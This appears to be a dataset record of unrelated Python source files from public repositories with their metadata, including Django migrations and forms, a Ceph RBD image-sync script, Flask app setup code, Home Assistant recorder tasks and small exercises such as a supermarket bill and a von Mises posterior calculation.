'vendor_tag': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'stunable_wepay.wepaytransaction': {
'Meta': {'object_name': 'WePayTransaction'},
'checkout_id': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['cart']
|
[
"gdamon@gmail.com"
] |
gdamon@gmail.com
|
e3304c28ddec47e47e05ea577296a4fbb00aed1a
|
53e37c177f580e11bd856b8f0291a3abb8d77450
|
/core/forms.py
|
0329f14dee625c89b51c9682c474684a0ffbe54b
|
[] |
no_license
|
cefer96/test-project
|
74426b510c4a415256a9b932fee9b619065540e1
|
6ec89d0b5cb4ef1dbbb79de605b1325281366acb
|
refs/heads/master
| 2020-11-25T12:19:59.424802
| 2019-12-19T16:38:32
| 2019-12-19T16:38:32
| 228,656,177
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 288
|
py
|
from django import forms
from core.models import MailTest
class MailForms(forms.ModelForm):
email = forms.CharField(label='Email', widget=forms.EmailInput(attrs={'placeholder': "Email",'class': 'form-control'}))
class Meta:
model = MailTest
fields = '__all__'
|
[
"jafar.h@labrin.tech"
] |
jafar.h@labrin.tech
|
745339c36ac28bb2eaffbf6808ab4d627b34c918
|
09a9748b6a107af9d4b1f1cbd6aa6fa5fa94c36a
|
/imageUpload/migrations/0005_cosmetics.py
|
03bd628da7ae5572911d3506560a09dd4c99bf84
|
[] |
no_license
|
choijy1994/showmethecolor
|
986a4619ffc3bf7e2e116e50813536066d840a30
|
eaebab1e9c94b23e76175680e8b82b970897a399
|
refs/heads/master
| 2022-12-11T01:37:49.855657
| 2019-06-08T06:54:06
| 2019-06-08T06:54:06
| 190,741,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
# Generated by Django 2.1.7 on 2019-05-08 06:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('imageUpload', '0004_auto_20190508_1512'),
]
operations = [
migrations.CreateModel(
name='Cosmetics',
fields=[
('name', models.CharField(default='', max_length=50, primary_key=True, serialize=False)),
('brand', models.CharField(default='', max_length=50)),
('R', models.IntegerField()),
('G', models.IntegerField()),
('B', models.IntegerField()),
],
),
]
|
[
"shvk54@gmail.com"
] |
shvk54@gmail.com
|
1cc827a04aae95a9a2e9660b399b01a893ba1ac2
|
94cf6abf87852d513fec6e41dbf69f15d835487e
|
/learn-rbd.py
|
af24d053dd155f59d1bdfdaa6a5c440b5f3b8efb
|
[] |
no_license
|
binhnq94/learn_ceph
|
0f7eed16668469a93c698811b307622f201ec6cd
|
6e5421987a33f835ad04d92dbeb88e9b2d526f67
|
refs/heads/master
| 2021-07-29T08:39:55.432536
| 2016-07-01T10:26:38
| 2016-07-01T10:26:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,486
|
py
|
import rbd
import rados
import os
try:
cluster = rados.Rados(conffile=os.path.abspath('ceph.conf'))
except TypeError as e:
print 'Argument validation error: ', e
raise e
# print "Created cluster handle."
try:
cluster.connect()
except Exception as e:
print "connection error: ", e
raise e
# finally:
# print "Connected to the cluster."
if not cluster.pool_exists('pool1'):
# print "create data pool"
# cluster.create_pool('data')
raise RuntimeError('No data pool exists')
ioctx = cluster.open_ioctx('pool1')
diffs = []
def interate_cd(offset, length, exists):
# print "-------------------------"
# print "offset: ", offset
# print "length: ", length
# print "exists: ", exists
diffs.append({'offset': offset, 'length':length, 'exists': exists})
with rbd.Image(ioctx, 'binh') as image:
with rbd.Image(ioctx, 'binh_dr') as image1:
# print image.size()
# print image1.size()
snaps = image.list_snaps()
# for snap in snaps:
# print snap
# print image.size()
image.diff_iterate(0, image.size(), 'snap1', interate_cd)
# print diffs
with open('test-diff', 'w') as file:
for diff in diffs:
# print type(image.read(diff['offset'], diff['length']))
image1.write(image.read(diff['offset'], diff['length']), diff['offset'])
image.close()
image1.close()
ioctx.close()
cluster.shutdown()
|
[
"quangbinh.nguyentrong@gmail.com"
] |
quangbinh.nguyentrong@gmail.com
|
be49c80a19b24f3461b98a97239a5ee906b066c3
|
952eaaff06d57b02cddbfa3ea244bbdca2f0e106
|
/src/Utils/Python/Tests/test_ElementData.py
|
542e6c8ce12be289f13e273807a06658fdaf9566
|
[
"BSD-3-Clause"
] |
permissive
|
DockBio/utilities
|
413cbde988d75a975b3e357c700caa87406c963b
|
213ed5ac2a64886b16d0fee1fcecb34d36eea9e9
|
refs/heads/master
| 2023-02-25T20:50:19.211145
| 2020-04-27T20:41:03
| 2020-04-27T20:41:03
| 257,099,174
| 0
| 0
|
BSD-3-Clause
| 2020-04-27T20:41:05
| 2020-04-19T20:48:18
| null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
import pytest
import scine_utilities as scine
def test_ElementData():
a = scine.ElementDataSingleton.instance()
# Access via element type and symbol string
element_data_h = a[scine.ElementType.H]
element_data_f = a["F"]
assert element_data_h.symbol == "H"
assert element_data_f.Z == 9
|
[
"scine@phys.chem.ethz.ch"
] |
scine@phys.chem.ethz.ch
|
86edd47ed717d86ca698b95755233877fc986709
|
16592bba87fdc74aed04f9fe9256d413e5867d3d
|
/app.py
|
272a1e6cf3efe633cfc843674ddee727ba50796a
|
[] |
no_license
|
chenjf2015103095/FaceNet
|
7a79abf7d832265f622c0d8a47e45f5f2442ec5c
|
bb97c4dfe53358de458639170ad0b09a7d1cc0ae
|
refs/heads/master
| 2023-03-30T07:31:01.084393
| 2021-05-21T07:40:29
| 2021-05-21T07:40:29
| 191,882,724
| 0
| 0
| null | 2023-03-25T00:06:52
| 2019-06-14T05:46:02
|
Python
|
UTF-8
|
Python
| false
| false
| 3,475
|
py
|
# -*- coding:utf-8 -*-
from flask import Flask, g
from flask import request, Response,render_template
from werkzeug.contrib.fixers import ProxyFix
import config
from zhousf_lib.util import log, string_util
from info import response_info as res
import time
import random
from flask_sqlalchemy import SQLAlchemy
def config_app(flask_app):
flask_app.jinja_env.auto_reload = True
flask_app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
flask_app.secret_key = config.CONFIG_SERVER.secret_key
flask_app.config['JSON_AS_ASCII'] = False
flask_app.wsgi_app = ProxyFix(app.wsgi_app)
flask_app.config['SQLALCHEMY_DATABASE_URI'] = config.CONFIG_SERVER.database_url
flask_app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = 'True'
@flask_app.before_request
def before_request():
request_id = str(time.time()) + '_' + str(random.randint(10000, 99999))
real_ip = request.headers.get('X-Real-Ip', request.remote_addr)
g.request_id = request_id
g.real_ip = real_ip
g.request_path = str(request.path)
msg = 'request =[request_id:%s, ip:%s, url:%s, method:%s]' \
% (request_id, real_ip, g.request_path, str(request.method))
log.API.info(msg)
# abort(400)
@flask_app.after_request
def after_request(environ):
# if isinstance(environ, Response):
# if string_util.not_contain(environ.data, '<html>'):
# log.API.info(
# 'response=[request_id:%s, ip:%s, %s]' % (g.request_id, g.real_ip, environ.data))
return environ
@flask_app.errorhandler(405)
def method_illegal(e):
return res.package(405, 'Method Not Allowed.')
@flask_app.errorhandler(404)
def url_not_found(e):
return res.package(404, 'Not Found: ' + g.request_path)
@flask_app.errorhandler(400)
def internal_server_error(e):
return res.package(400, 'The request was refused.')
@flask_app.errorhandler(Exception)
def exception_error(e):
return res.package(500, 'Exception:%s' % str(e.message))
@flask_app.errorhandler(500)
def internal_server_error(e):
return res.package(500, 'Server internal error.')
def register_blueprint(flask_app):
from business.model_user import userModel
flask_app.register_blueprint(userModel, url_prefix='/user')
app = Flask(__name__)
@app.route('/')
def hello():
real_ip = request.headers.get('X-Real-Ip', request.remote_addr)
return 'Hello %s' % real_ip
# @app.route('/user/sign_in/')
# def sign_in():
# return render_template('sign_in.html')
# @app.route('user/sign_up/')
# def sign_up():
# return render_template('sign_up.html')
config_app(app)
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), unique=True)
age = db.Column(db.Integer)
sex = db.Column(db.String(10))
department = db.Column(db.String(100))
identifyId = db.Column(db.String(100))
faceId = db.Column(db.Text)
if __name__ == "__main__":
register_blueprint(app)
if config.CONFIG_SERVER.use_ssl:
ssl_context = (config.CONFIG_SERVER.ssl_crt, config.CONFIG_SERVER.ssl_key)
else:
ssl_context = None
app.run(host=config.CONFIG_SERVER.host,
port=config.CONFIG_SERVER.port,
debug=config.CONFIG_SERVER.debug,
ssl_context=ssl_context,
threaded=True)
db.create_all()
|
[
"1309304223@qq.com"
] |
1309304223@qq.com
|
ae7a581398c97e0116c2064320984c14329749df
|
a3a5f5c1e0b24f9017d11e87c0f4ea5121831ff0
|
/Workspace/blogproject/blog/views.py
|
d09b4ff70fdbe1060173faa5f8032faf9b0e59dd
|
[] |
no_license
|
HANCAO/hschen.top
|
32478befd5d816b7b703395dbbc21f5587a0e3bd
|
3b2bbac306900fa75ec73c41fa3cb01ed3de6e52
|
refs/heads/master
| 2021-05-08T00:26:29.055050
| 2019-02-17T03:23:36
| 2019-02-17T03:23:36
| 107,679,469
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,611
|
py
|
import markdown
from django.shortcuts import render,get_object_or_404
from .models import Post,Category
from comments.forms import CommentForm
# Create your views here.
def index(request):
post_list=Post.objects.all().order_by('-created_time')
return render(request,'blog/index.html',context={'post_list':post_list})
#return render(request,'blog/index.html',context={
# 'title':'我的博客首页',
# 'welcome':'欢迎访问我的博客首页'
# })
def archives(request,year,month):
post_list=Post.objects.filter(created_time__year=year,
created_time__month=month,
).order_by('-created_time')
return render(request,'blog/index.html',context={'post_list':post_list})
def category(request,pk):
cate=get_object_or_404(Category,pk=pk)
post_list=Post.objects.filter(category=cate).order_by('-created_time')
return render(request,'blog/index.html',context={'post_list':post_list})
def detail(request,pk):
post=get_object_or_404(Post,pk=pk)
post.body=markdown.markdown(post.body,
extensions=[
'markdown.extensions.extra',
'markdown.extensions.codehilite',
'markdown.extensions.toc',
])
form = CommentForm()
comment_list=post.comment_set.all()
context={
'post':post,
'form':form,
'comment_list':comment_list
}
return render(request,'blog/detail.html',context=context)
|
[
"noreply@github.com"
] |
HANCAO.noreply@github.com
|
5e60082b7b3c49ea6324f08d8a9ad2d6552f8f82
|
223caa5d05db031589dd754fcd697388273bd617
|
/Supermarket.py
|
8a3e68c5b0a10796c31476f602d1d18bb4b18235
|
[] |
no_license
|
LuanComputacao/python
|
72d34999e7098c0fba145072639128a753ee42d7
|
768d1600cfe7a8c0f0759683801ab2d4b3648aa4
|
refs/heads/master
| 2021-01-10T21:04:13.776670
| 2015-05-17T13:09:42
| 2015-05-17T13:09:42
| 34,735,096
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 582
|
py
|
shopping_list = ["apple", "pear", "banana"]
stock = {
"banana": 6,
"apple": 0,
"orange": 32,
"pear": 15
}
prices = {
"banana": 4,
"apple": 2,
"orange": 1.5,
"pear": 3
}
# Write your code below!
def compute_bill(food):
total = 0
for key in food:
print(key)
if stock[key] > 0:
total += prices[key]
stock[key] -= 1
print("price: %s" % prices[key])
else:
print("no item")
print("price: 0")
print
return total
print(compute_bill(shopping_list))
|
[
"luanengcomputacao@gmail.com"
] |
luanengcomputacao@gmail.com
|
6e2f2852dd8aac0e24dcbb59aaa9048e71c63bc6
|
3c59fb0705a561d5b32c91a8b323789837b6881b
|
/code/sth.py
|
892c9011dcf90ce21389c316081592d43c31e351
|
[] |
no_license
|
sarahlia/python-gen-exercises
|
13e15e20dc37d1630b42c200f2d1f8b05de81ca9
|
2b42eccb36f1a66c41689ea304bbc2b6ec498397
|
refs/heads/master
| 2023-08-15T04:33:45.646777
| 2021-10-22T20:33:17
| 2021-10-22T20:33:17
| 404,006,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
import os
from flask import Flask
def create_app(test_config=None):
app = Flask(__name__)
app.config.from_mapping(
SECRET_KEY=os.environ.get('SECRET_KEY', default='dev'),
)
if test_config is None:
app.config.from_pyfile('config.py', silent=True)
else:
app.config.from_mapping(test_config)
return app
|
[
"sarahlia23@outlook.com"
] |
sarahlia23@outlook.com
|
a6699e68f3554bf2e09f6facda57d2bce37c27ef
|
321b5e0646c9f26100d86c098da3ce52552088ac
|
/src/main/urls.py
|
0d2008087a32de5de963810a571ff387d12f1e36
|
[] |
no_license
|
Yobmod/dmlDjangoReact
|
9dc500f5242af86273d0001c699dc568b8579b50
|
74e295e0d8a0d521eb6131b20a4debd3e830a609
|
refs/heads/master
| 2022-04-03T10:31:42.329994
| 2017-08-14T15:53:07
| 2017-08-14T15:53:07
| 100,283,713
| 0
| 0
| null | 2020-02-15T15:06:44
| 2017-08-14T15:42:44
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 462
|
py
|
from django.conf.urls import url
from . import views
app_name = 'main'
urlpatterns = [
url(r'^$', views.homepage, name='homepage'),
url(r'^facilities/$', views.facilities, name='facilities'),
url(r'^projects/$', views.facilities, name='projects'),
url(r'^publications/$', views.publications, name='publications'),
url(r'^contact/$', views.contact, name='contact'),
#url(r'^admin/$', views.django_admin_page, name='django_admin_page'), #link to admin
]
|
[
"yobmod@gmail.com"
] |
yobmod@gmail.com
|
dc00e98dac1a9a7c2aa7b66c7b1a357d99fd40c1
|
57b3ec21cc55885467f130519e7e0e0d2b60cd7d
|
/VAE_cn/hlSeg/demo/pyHlSegDemo.py
|
e9d7310f12d8c2c162a24769e1648486ab15f8ef
|
[
"MIT"
] |
permissive
|
xihuateng/VAE_sentence_generation
|
bb4321235ca2c4bb79b2b000201b4657bd4bd7fb
|
45af709b7caf09fdb30e7291f19384d73be386d0
|
refs/heads/master
| 2022-01-04T22:20:51.879861
| 2019-05-02T07:12:29
| 2019-05-02T07:12:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,887
|
py
|
#! /usr/bin/python2
# -*-coding: UTF-8 -*-
'''繁体不能识别'''
import jpype
import os.path
import sys,time
import os
reload(sys)
sys.setdefaultencoding( "utf-8" )
if __name__ == "__main__":
#打开jvm虚拟机
jar_path = os.path.abspath(u'/home/ywj/VAE_sentence_generation/VAE_cn/hlSeg/lib/')
hlSegJarPath = os.path.join(jar_path, u"hlSegment-5.2.15.jar")
#太坑了,版本只能用openjdk 8,否则-Djava.ext.dirs不支持,继而产生N+个BUG!!!
jvmPath = u'/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64/server/libjvm.so'
jpype.startJVM(jvmPath, "-ea", "-Djava.class.path=%s" % hlSegJarPath, "-Djava.ext.dirs=%s" % jar_path)
#取得类定义
BasicSegmentor = jpype.JClass('com.hylanda.segmentor.BasicSegmentor')
SegOption = jpype.JClass('com.hylanda.segmentor.common.SegOption')
SegGrain = jpype.JClass('com.hylanda.segmentor.common.SegGrain')
SegResult = jpype.JClass('com.hylanda.segmentor.common.SegResult')
#创建分词对象
segmentor = BasicSegmentor()
#加载词典, 如果没有用户自定义词典,可以用下面的语句加载,自定义词典需要注意文件码制
#if not segmentor.loadDictionary("./hlsegsource/dictionary/CoreDict.dat", "../dictionary/userDict_utf8.txt"):
if not segmentor.loadDictionary("/home/ywj/VAE_sentence_generation/VAE_cn/hlSeg/dictionary/CoreDict.dat", None):
print "字典加载失败!"
exit()
#创建SegOption对象,如果使用默认的分词选项,也可以直接传空
option = SegOption()
option.mergeNumeralAndQuantity = False
#可以使用下面的语句调整分词颗粒度
#option.grainSize = SegGrain.LARGE
#分词
path_in=u'/home/ywj/VAE_sentence_generation/VAE_cn/hlSeg/data/'
file_in=u'untrain.txt'
#file_in=u'as_test_jt.utf8'
#file_in=u'cityu_test_jt.utf8'
#file_in=u'msr_test.utf8'
#file_in=u'pku_test.utf8'
fr = open(path_in+file_in)
path_out=u'/home/ywj/VAE_sentence_generation/VAE_cn/hlSeg/data/'
file_out=u'untrainseg.txt'
#file_out=u'as_result.utf8'
#file_out=u'cityu_result.utf8'
#file_out=u'msr_result.utf8'
#file_out=u'pku_result.utf8'
fw = open(path_out+file_out,'a+')
#遍历并打印分词结果
for line in fr.readlines():
segResult = segmentor.segment(line, option)
word = segResult.getFirst()
while(word != None):
fw.write(word.wordStr)
fw.write(' ')
word = word.next
fr.close()
fw.close()
jpype.shutdownJVM()
exit()
'''
#分词
segResult = segmentor.segment(u"欢迎使用由天津海量信息技术股份有限公司出品的海量中文分词系统", option)
#遍历并打印分词结果
word = segResult.getFirst()
print "\nWords: ",
while(word != None):
print word.wordStr,
word = word.next
#获取关键词
keywords = segResult.getKeywordsList()
print "\nkeywords: ",
for kw in keywords: print "%s:%.1f" % (kw.wordStr, kw.weight),
print ""
jpype.shutdownJVM()
exit()
'''
|
[
"mryuan0428@126.com"
] |
mryuan0428@126.com
|
9f3b3d6985ccaeae9c7b73e2963e76eb98dd2e1d
|
73ceefbaac7900eca5ac84fbb3dc695bbef95a81
|
/py/rackattack/dashboard/main.py
|
1517f8998731826ac4a999c7e8e741a812e58be4
|
[
"Apache-2.0"
] |
permissive
|
shlomimatichin/rackattack-physical-dashboard
|
18d917db1c12cbbae2f7fbedf8773adf74f8fba5
|
a814060f3602b27e3e2e8e7ac0161966e9db6f88
|
refs/heads/master
| 2020-12-11T05:26:15.507928
| 2015-04-15T09:16:58
| 2015-04-15T09:16:58
| 28,646,899
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,548
|
py
|
import logging
import argparse
import realtimewebui.config
import os
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
parser = argparse.ArgumentParser()
parser.add_argument("--webPort", type=int, default=6001)
parser.add_argument("--webSocketPort", type=int, default=6002)
parser.add_argument("--realtimewebuiRoot")
parser.add_argument("--dashboardRoot")
parser.add_argument("--localhostRackattackProvider", action='store_true')
args = parser.parse_args()
if args.realtimewebuiRoot is not None:
realtimewebui.config.REALTIMEWEBUI_ROOT_DIRECTORY = args.realtimewebuiRoot
if args.localhostRackattackProvider:
os.environ['RACKATTACK_PROVIDER'] = \
'tcp://localhost:1014@@amqp://guest:guest@localhost:1013/%2F@@http://localhost:1016'
from realtimewebui import server
from realtimewebui import rootresource
from realtimewebui import render
from rackattack.dashboard import pollthread
from twisted.web import static
poller = pollthread.PollThread()
render.addTemplateDir(os.path.join(args.dashboardRoot, 'html'))
render.DEFAULTS['title'] = "Rackattack"
render.DEFAULTS['brand'] = "Rackattack"
render.DEFAULTS['mainMenu'] = []
root = rootresource.rootResource()
root.putChild("js", static.File(os.path.join(args.dashboardRoot, "js")))
root.putChild("static", static.File(os.path.join(args.dashboardRoot, "static")))
root.putChild("favicon.ico", static.File(os.path.join(args.dashboardRoot, "static", "favicon.ico")))
server.runUnsecured(root, args.webPort, args.webSocketPort)
|
[
"shlomi@stratoscale.com"
] |
shlomi@stratoscale.com
|
2c99dad24a3c1b9b80a778fbd17b3940b195e505
|
bfda1c08ba7c3df8c34fc6ead8258f8b13d38526
|
/homeassistant/components/recorder/tasks.py
|
e12526b316acabe74496e9da1991cbe04367c4ec
|
[
"Apache-2.0"
] |
permissive
|
cliffordm/home-assistant
|
60353e65505deb1a440986407843d5c98da980a0
|
1c4c0f1eb33302b983cb39f6800cd0fe6943fc4a
|
refs/heads/dev
| 2023-02-22T18:31:50.141720
| 2022-05-19T16:50:54
| 2022-05-19T16:50:54
| 153,680,484
| 0
| 0
|
Apache-2.0
| 2023-02-22T06:19:10
| 2018-10-18T20:01:52
|
Python
|
UTF-8
|
Python
| false
| false
| 7,180
|
py
|
"""Support for recording details."""
from __future__ import annotations
import abc
import asyncio
from collections.abc import Callable, Iterable
from dataclasses import dataclass
from datetime import datetime
import threading
from typing import TYPE_CHECKING, Any
from homeassistant.core import Event
from . import purge, statistics
from .const import DOMAIN, EXCLUDE_ATTRIBUTES
from .models import StatisticData, StatisticMetaData
from .util import periodic_db_cleanups
if TYPE_CHECKING:
from .core import Recorder
class RecorderTask(abc.ABC):
"""ABC for recorder tasks."""
commit_before = True
@abc.abstractmethod
def run(self, instance: Recorder) -> None:
"""Handle the task."""
@dataclass
class ClearStatisticsTask(RecorderTask):
"""Object to store statistics_ids which for which to remove statistics."""
statistic_ids: list[str]
def run(self, instance: Recorder) -> None:
"""Handle the task."""
statistics.clear_statistics(instance, self.statistic_ids)
@dataclass
class UpdateStatisticsMetadataTask(RecorderTask):
"""Object to store statistics_id and unit for update of statistics metadata."""
statistic_id: str
unit_of_measurement: str | None
def run(self, instance: Recorder) -> None:
"""Handle the task."""
statistics.update_statistics_metadata(
instance, self.statistic_id, self.unit_of_measurement
)
@dataclass
class PurgeTask(RecorderTask):
"""Object to store information about purge task."""
purge_before: datetime
repack: bool
apply_filter: bool
def run(self, instance: Recorder) -> None:
"""Purge the database."""
if purge.purge_old_data(
instance, self.purge_before, self.repack, self.apply_filter
):
with instance.get_session() as session:
instance.run_history.load_from_db(session)
# We always need to do the db cleanups after a purge
# is finished to ensure the WAL checkpoint and other
# tasks happen after a vacuum.
periodic_db_cleanups(instance)
return
# Schedule a new purge task if this one didn't finish
instance.queue_task(
PurgeTask(self.purge_before, self.repack, self.apply_filter)
)
@dataclass
class PurgeEntitiesTask(RecorderTask):
"""Object to store entity information about purge task."""
entity_filter: Callable[[str], bool]
def run(self, instance: Recorder) -> None:
"""Purge entities from the database."""
if purge.purge_entity_data(instance, self.entity_filter):
return
# Schedule a new purge task if this one didn't finish
instance.queue_task(PurgeEntitiesTask(self.entity_filter))
@dataclass
class PerodicCleanupTask(RecorderTask):
"""An object to insert into the recorder to trigger cleanup tasks when auto purge is disabled."""
def run(self, instance: Recorder) -> None:
"""Handle the task."""
periodic_db_cleanups(instance)
@dataclass
class StatisticsTask(RecorderTask):
"""An object to insert into the recorder queue to run a statistics task."""
start: datetime
def run(self, instance: Recorder) -> None:
"""Run statistics task."""
if statistics.compile_statistics(instance, self.start):
return
# Schedule a new statistics task if this one didn't finish
instance.queue_task(StatisticsTask(self.start))
@dataclass
class ExternalStatisticsTask(RecorderTask):
"""An object to insert into the recorder queue to run an external statistics task."""
metadata: StatisticMetaData
statistics: Iterable[StatisticData]
def run(self, instance: Recorder) -> None:
"""Run statistics task."""
if statistics.add_external_statistics(instance, self.metadata, self.statistics):
return
# Schedule a new statistics task if this one didn't finish
instance.queue_task(ExternalStatisticsTask(self.metadata, self.statistics))
@dataclass
class AdjustStatisticsTask(RecorderTask):
"""An object to insert into the recorder queue to run an adjust statistics task."""
statistic_id: str
start_time: datetime
sum_adjustment: float
def run(self, instance: Recorder) -> None:
"""Run statistics task."""
if statistics.adjust_statistics(
instance,
self.statistic_id,
self.start_time,
self.sum_adjustment,
):
return
# Schedule a new adjust statistics task if this one didn't finish
instance.queue_task(
AdjustStatisticsTask(
self.statistic_id, self.start_time, self.sum_adjustment
)
)
@dataclass
class WaitTask(RecorderTask):
"""An object to insert into the recorder queue to tell it set the _queue_watch event."""
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
instance._queue_watch.set() # pylint: disable=[protected-access]
@dataclass
class DatabaseLockTask(RecorderTask):
"""An object to insert into the recorder queue to prevent writes to the database."""
database_locked: asyncio.Event
database_unlock: threading.Event
queue_overflow: bool
def run(self, instance: Recorder) -> None:
"""Handle the task."""
instance._lock_database(self) # pylint: disable=[protected-access]
@dataclass
class StopTask(RecorderTask):
"""An object to insert into the recorder queue to stop the event handler."""
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
instance.stop_requested = True
@dataclass
class EventTask(RecorderTask):
"""An event to be processed."""
event: Event
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
# pylint: disable-next=[protected-access]
instance._process_one_event(self.event)
@dataclass
class KeepAliveTask(RecorderTask):
"""A keep alive to be sent."""
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
# pylint: disable-next=[protected-access]
instance._send_keep_alive()
@dataclass
class CommitTask(RecorderTask):
"""Commit the event session."""
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
# pylint: disable-next=[protected-access]
instance._commit_event_session_or_retry()
@dataclass
class AddRecorderPlatformTask(RecorderTask):
"""Add a recorder platform."""
domain: str
platform: Any
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
hass = instance.hass
domain = self.domain
platform = self.platform
platforms: dict[str, Any] = hass.data[DOMAIN]
platforms[domain] = platform
if hasattr(self.platform, "exclude_attributes"):
hass.data[EXCLUDE_ATTRIBUTES][domain] = platform.exclude_attributes(hass)
|
[
"noreply@github.com"
] |
cliffordm.noreply@github.com
|
35745d79bc0f9b883783f984cd1176ae324fce1e
|
edbe27c332625262f11d83d5f4b797402e19a6ea
|
/calculateMpg.py
|
433ab10c39d264e67dac4dcb5224c113119cf925
|
[] |
no_license
|
vithura/Python-Lab4
|
9e505a2c23aaee2582291b08ce07fc739bbc8469
|
cd7aea667f9f7a2a489585221de817b1a05064fe
|
refs/heads/master
| 2020-08-02T02:06:01.056653
| 2019-09-27T00:09:23
| 2019-09-27T00:09:23
| 211,201,708
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 199
|
py
|
import srib0001library
input1 = int(input('Howmany miles driven'));
input2 = int(input('Howmuch gas you use in gallons'));
print('Your MPG is ' + str(srib0001library.calculateMpg(input1, input2)));
|
[
"srib0001@algonquinlive.com"
] |
srib0001@algonquinlive.com
|
c694dfefddf3e823716546e6067c6c58879bd074
|
387615c1ed7bec3143939dd8647b0642c9f25817
|
/Single Parameter Bayesian Inference/vonMises.py
|
bc7ef2f03ff748a2b32cd9c114ca9618502f9b6b
|
[] |
no_license
|
tsigkas/Bayesian-Methods
|
103cc856eb7b8c8576aacc21e327f8ed81478cab
|
2d3c7b86478fb2dec31ffa26cceeca44dd23fe76
|
refs/heads/main
| 2023-05-14T05:42:58.628944
| 2021-06-09T11:18:49
| 2021-06-09T11:18:49
| 374,657,824
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,168
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.special import iv as bessel
from scipy.integrate import quad
np.random.seed(123) # set seed for reproducability
# Dataset of wind directions in radians
y = np.array([-2.44, 2.14, 2.54, 1.83, 2.02, 2.33, -2.79, 2.23, 2.07, 2.02])
mu = 2.39
lamda = 1
# Function proportional to the posterior distribution
# Given von-Mises(kappa,mu) likelihood and Exp(lamda) prior
def posterior(kappa, y, lamda, mu):
n = len(y)
return (lamda/bessel(0,kappa))**n*np.exp(kappa*(np.sum(np.cos(y-mu))-lamda))
# Find posterior for different values of kappa
kappa = np.linspace(0.01,5,10000)
posterior_kappa = np.zeros_like(kappa)
posterior_kappa = posterior(kappa, y, lamda, mu)
# Normalize the posterior so that it integrates to 1
posterior_kappa = posterior_kappa/(quad(posterior, 0.01, 5, args = (y, lamda, mu))[0])
# Find the posterior mode from the density
mode = kappa[np.argmax(posterior_kappa)]
# Plot posterior
plt.plot(kappa, posterior_kappa)
plt.xlabel(r"$\kappa$")
plt.ylabel("posterior density")
plt.vlines(mode,0,np.max(posterior_kappa))
plt.savefig("kappa_posterior_pdf.png", dpi=1500)
plt.show
|
[
"noreply@github.com"
] |
tsigkas.noreply@github.com
|
415e721fb6d5ea182b0e3b9238b59bba43fd6154
|
f6cb9c53b2f8340b0e2fa18004f79214eb9e27f9
|
/webchat/migrations/0001_initial.py
|
3d028744a7653bd7f198540731ce9817f2edeb84
|
[] |
no_license
|
joey100/simpleBBS
|
3c861a5718c5cfd45d7918aa598b3c4af36a1d8b
|
0697acb1f916ace25d8289e7e9ff54c48d274f48
|
refs/heads/master
| 2021-01-20T20:36:53.052875
| 2016-09-28T02:47:07
| 2016-09-28T02:47:07
| 64,055,300
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,124
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-07-03 09:51
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('bbs', '0002_auto_20160703_1751'),
]
operations = [
migrations.CreateModel(
name='WebGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64)),
('brief', models.CharField(blank=True, max_length=255, null=True)),
('max_members', models.IntegerField(default=200)),
('admins', models.ManyToManyField(blank=True, related_name='group_admins', to='bbs.UserProfile')),
('members', models.ManyToManyField(blank=True, related_name='group_members', to='bbs.UserProfile')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bbs.UserProfile')),
],
),
]
|
[
"smartheshuiping@163.com"
] |
smartheshuiping@163.com
|
8dda786957a949c985bd9e218d140b6c11c735e6
|
b6257edc98da9cfffd5666193726c0da48415e29
|
/config.py
|
c0100342c4504364e0d1d32e6c529a5929491572
|
[] |
no_license
|
akhiaji/spear
|
2919af714a274bfee81545bc7f45aa47646d823c
|
2984b7121fdbf3a56fd773473ca5657af09b551a
|
refs/heads/master
| 2020-05-25T11:06:24.669356
| 2015-08-05T10:25:35
| 2015-08-05T10:25:35
| 40,239,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
DATABASE = '/tmp/spear.db'
DEBUG = True
SECRET_KEY = 'development key'
DROPBOX_APP_KEY = '1szh06pzua9nm1a'
